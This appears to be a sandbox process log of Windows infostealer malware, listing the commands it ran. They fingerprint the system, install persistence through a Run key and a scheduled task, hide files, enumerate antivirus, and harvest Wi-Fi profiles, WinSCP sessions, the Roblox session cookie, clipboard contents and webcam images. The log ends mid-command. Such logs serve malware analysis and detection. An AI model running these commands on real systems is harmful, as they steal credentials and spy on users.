C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=5076 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=5076 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupNBPdrq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupNBPdrq /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupNBPdrq /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupNBPdrq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe /f

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupNBPdrq /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\r3naeRIDdQoK.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\cscript.exe

cscript C:\Users\Admin\AppData\Roaming\r3naeRIDdQoK.vbs

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\sTEixZrDta9V_temp.ps1""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {netsh wlan show profile}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\DEybUpMWLn7J4ftWEJYI\System\cam.1528_Admin.jpg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\sTEixZrDta9V_temp.ps1"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\DEybUpMWLn7J4ftWEJYI\System\cam.1528_Admin"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_NBPdrq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs\"""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_NBPdrq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -Command " Add-Type -TypeDefinition @' using System.Runtime.InteropServices; [Guid(\"5CDF2C82-841E-4546-9722-0CF74078229A\"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] interface IAudioEndpointVolume { int f(); int g(); int h(); int i(); int SetMasterVolumeLevelScalar(float fLevel, System.Guid pguidEventContext); int j(); int GetMasterVolumeLevelScalar(out float pfLevel); int k(); int l(); int m(); int n(); int SetMute([MarshalAs(UnmanagedType.Bool)] bool bMute, System.Guid pguidEventContext); int GetMute(out bool pbMute); } [Guid(\"D666063F-1587-4E43-81F1-B948E807363F\"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] interface IMMDevice { int Activate(ref System.Guid id, int clsCtx, int activationParams, out IAudioEndpointVolume aev); } [Guid(\"A95664D2-9614-4F35-A746-DE8DB63617E6\"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] interface IMMDeviceEnumerator { int f(); int GetDefaultAudioEndpoint(int dataFlow, int role, out IMMDevice endpoint); } [ComImport, Guid(\"BCDE0395-E52F-467C-8E3D-C4579291692E\")] class MMDeviceEnumeratorComObject { } public class Audio { static IAudioEndpointVolume Vol() { var enumerator = new MMDeviceEnumeratorComObject() as IMMDeviceEnumerator; IMMDevice dev = null; Marshal.ThrowExceptionForHR(enumerator.GetDefaultAudioEndpoint(/*eRender*/ 0, /*eMultimedia*/ 1, out dev)); IAudioEndpointVolume epv = null; var epvid = typeof(IAudioEndpointVolume).GUID; Marshal.ThrowExceptionForHR(dev.Activate(ref epvid, /*CLSCTX_ALL*/ 23, 0, out epv)); return epv; } public static float Volume { get { float v = -1; Marshal.ThrowExceptionForHR(Vol().GetMasterVolumeLevelScalar(out v)); return v; } set { Marshal.ThrowExceptionForHR(Vol().SetMasterVolumeLevelScalar(value, System.Guid.Empty)); } } public static bool Mute { get { bool mute; Marshal.ThrowExceptionForHR(Vol().GetMute(out 